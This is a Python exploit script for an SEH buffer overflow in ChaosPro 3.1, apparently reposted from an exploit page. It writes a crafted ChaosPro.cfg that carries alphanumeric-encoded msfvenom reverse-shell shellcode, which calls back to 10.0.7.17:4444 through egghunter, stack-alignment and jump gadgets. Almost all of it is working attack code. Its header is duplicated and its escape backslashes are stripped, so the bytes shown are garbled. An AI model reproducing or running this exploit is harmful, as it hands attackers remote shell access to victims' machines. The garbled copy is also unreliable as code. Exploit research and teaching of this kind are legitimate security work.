ChaosPro 3.1 SEH Buffer Overflow

#!C:Python27python.exe

# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3 #!C:Python27python.exe

# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html

# our egg!
payload = "T00WT00W"

# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "x83xC4x02"

#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b 'x00'
"x89xe1xdbxd7xd9x71xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4cx42x53x30"
"x33x30x43x30x55x30x4bx39x4bx55x46x51x4fx30x32"
"x44x4cx4bx56x30x56x50x4cx4bx46x32x54x4cx4cx4b"
"x50x52x45x44x4cx4bx34x32x37x58x44x4fx4fx47x30"
"x4ax36x46x30x31x4bx4fx4ex4cx47x4cx45x31x43x4c"
"x44x42x56x4cx47x50x4fx31x58x4fx34x4dx45x51x39"
"x57x4bx52x4cx32x56x32x31x47x4cx4bx46x32x32x30"
"x4cx4bx50x4ax47x4cx4cx4bx30x4cx32x31x52x58x4b"
"x53x31x58x53x31x4ex31x36x31x4cx4bx50x59x37x50"
"x45x51x58x53x4cx4bx47x39x35x48x4dx33x37x4ax30"
"x49x4cx4bx57x44x4cx4bx53x31x49x46x46x51x4bx4f"
"x4ex4cx39x51x58x4fx54x4dx45x51x4fx37x36x58x4d"
"x30x33x45x4ax56x43x33x43x4dx4cx38x57x4bx43x4d"
"x56x44x42x55x5ax44x31x48x4cx4bx46x38x31x34x35"
"x51x4ex33x35x36x4cx4bx34x4cx30x4bx4cx4bx56x38"
"x45x4cx55x51x38x53x4cx4bx54x44x4cx4bx45x51x38"
"x50x4dx59x51x54x46x44x56x44x31x4bx31x4bx43x51"
"x31x49x50x5ax30x51x4bx4fx4bx50x51x4fx31x4fx51"
"x4ax4cx4bx32x32x4ax4bx4cx4dx31x4dx42x48x47x43"
"x57x42x53x30x55x50x35x38x53x47x43x43x30x32x31"
"x4fx31x44x33x58x30x4cx33x47x57x56x54x47x4bx4f"
"x49x45x48x38x4ax30x35x51x43x30x35x50x56x49x59"
"x54x36x34x36x30x52x48x56x49x4bx30x52x4bx35x50"
"x4bx4fx59x45x30x50x56x30x56x30x46x30x51x50x36"
"x30x57x30x46x30x55x38x4ax4ax54x4fx39x4fx4bx50"
"x4bx4fx39x45x4dx47x42x4ax35x55x52x48x45x5ax53"
"x30x33x37x34x51x52x48x45x52x53x30x54x51x31x4c"
"x4dx59x5ax46x32x4ax52x30x50x56x46x37x32x48x5a"
"x39x59x35x54x34x43x51x4bx4fx39x45x4dx55x49x50"
"x33x44x44x4cx4bx4fx30x4ex44x48x43x45x5ax4cx35"
"x38x4cx30x48x35x4fx52x36x36x4bx4fx49x45x55x38"
"x52x43x52x4dx52x44x43x30x4bx39x4bx53x56x37x46"
"x37x31x47x50x31x4ax56x33x5ax42x32x51x49x46x36"
"x4bx52x4bx4dx53x56x4fx37x51x54x57x54x37x4cx53"
"x31x43x31x4cx4dx50x44x31x34x34x50x58x46x55x50"
"x30x44x31x44x30x50x30x56x50x56x50x56x30x46x36"
"x36x50x4ex31x46x50x56x50x53x31x46x43x58x52x59"
"x58x4cx47x4fx4bx36x4bx4fx49x45x4dx59x4dx30x50"
"x4ex30x56x57x36x4bx4fx36x50x45x38x44x48x4cx47"
"x35x4dx45x30x4bx4fx49x45x4fx4bx5ax50x48x35x59"
"x32x30x56x42x48x4ex46x4ax35x4fx4dx4dx4dx4bx4f"
"x4ex35x37x4cx54x46x53x4cx54x4ax4dx50x4bx4bx4b"
"x50x52x55x33x35x4fx4bx31x57x54x53x54x32x32x4f"
"x43x5ax33x30x31x43x4bx4fx4ex35x41x41"
)

#badchars
#x0ax1ax3bx90x91x92x93x94x95x96x97x98x99x9a
#x9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9
#xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8
#xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7
#xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6
#xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5
#xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4
#xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff

# stack alignment
pop_esp = "x5c"
pop_eax = "x58"
push_eax = "x50"
push_esp = "x54"
align_stack = "x2dx8fx8ex8dx8cx2dx7ex68x71x72x2dx01x01x01x01"
zero_eax = "x25x7ex7ex05x7ex25x01x01x7ax01"

#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "x40x75x80x75"
jmpforward06 = "x40x75x06x75"

#line containing our payload
line_start = "Username "
line_start += payload + " "

#line with our overflow
line_start += "ProjectPath "
junk = line_start

#the buffer starts being overwritten with
# our controlled values at 522
junk += "A" * 522

#junk += alpha_numeric_hex
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)

# baby nopsled
junk += "A" * 9

# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp

# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "x2dx89x88x87x86"
junk += "x2dx01x8fx77x8f"
junk += "x2dx01x04x01x02"
junk += push_eax

# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "x2dx4fx4ex4dx4c"
junk += "x2dx01x39x8fx02"
junk += "x2dx01x03x3cx01"
junk += push_eax

# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "x2dx8fx8ex74x73"
junk += "x2dx3ex19x01x8f"
junk += "x2dx03x01x01x26"
junk += push_eax

# size for section one
junk += "A" * (
126
- 9 # nopsled

# aligning the stack
- len(zero_eax)
- len(push_esp)
- len(pop_eax)
- len(align_stack)
- len(push_eax)
- len(pop_esp)

# first set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# second set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# third set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
)

# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#Section Two

# baby nopsled
junk += "AAA"

# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "x2dx80x15x75x75"
junk += "x2dx80x20x32x35"
junk += "x2dx14x11x04x25"
junk += push_eax

# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "x2dx8fx8ex8dx89"
junk += "x2dx34x6bx17x01"
junk += "x2dx01x01x01x01"
junk += push_eax

# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "x2dx8fx8ex8dx8c"
junk += "x2dx1dx18x8ex43"
junk += "x2dx01x01x17x01"
junk += push_eax

# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "x2dx8fx8ex8dx8c"
junk += "x2dx3ex7fx2dx2d"
junk += "x2dx02x17x01x03"
junk += push_eax

junk += "A" * (
126 # amount of room before we need to jump

- 3 # baby nopsled

# part one of fourth set of bytes going onto the stack
- len(zero_eax)

# part two of fourth sec of bytes going onto the stack
- 15
- len(push_eax)

# fifth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# sixth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# seventh set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

- 4 # baby nopsled
- len(jmpback80)
)

# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

# baby nopsled
junk += "AAAA"

# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "x2dx65x65x75x75"
junk += "x2dx65x65x25x25"
junk += "x2dx37x25x23x13"
junk += push_eax

# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "x2dx8fx81x7cx7b"
junk += "x2dx2dx17x01x8f"
junk += "x2dx01x01x01x2b"
junk += push_eax

junk += "A" * (
126 # amount of room before we need to jump

- len(jmpback80)

- 4 # baby nopsled

# eighth set of bytes going onto the stack
# eighth section
- len(zero_eax)
- 15
- len(push_eax)

# ninth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

- len(jmpforward06)
)

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "x5dx10x40"

# write the evil file
with open('C:\Program Files\ChaosPro3.1\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)
Leave a comment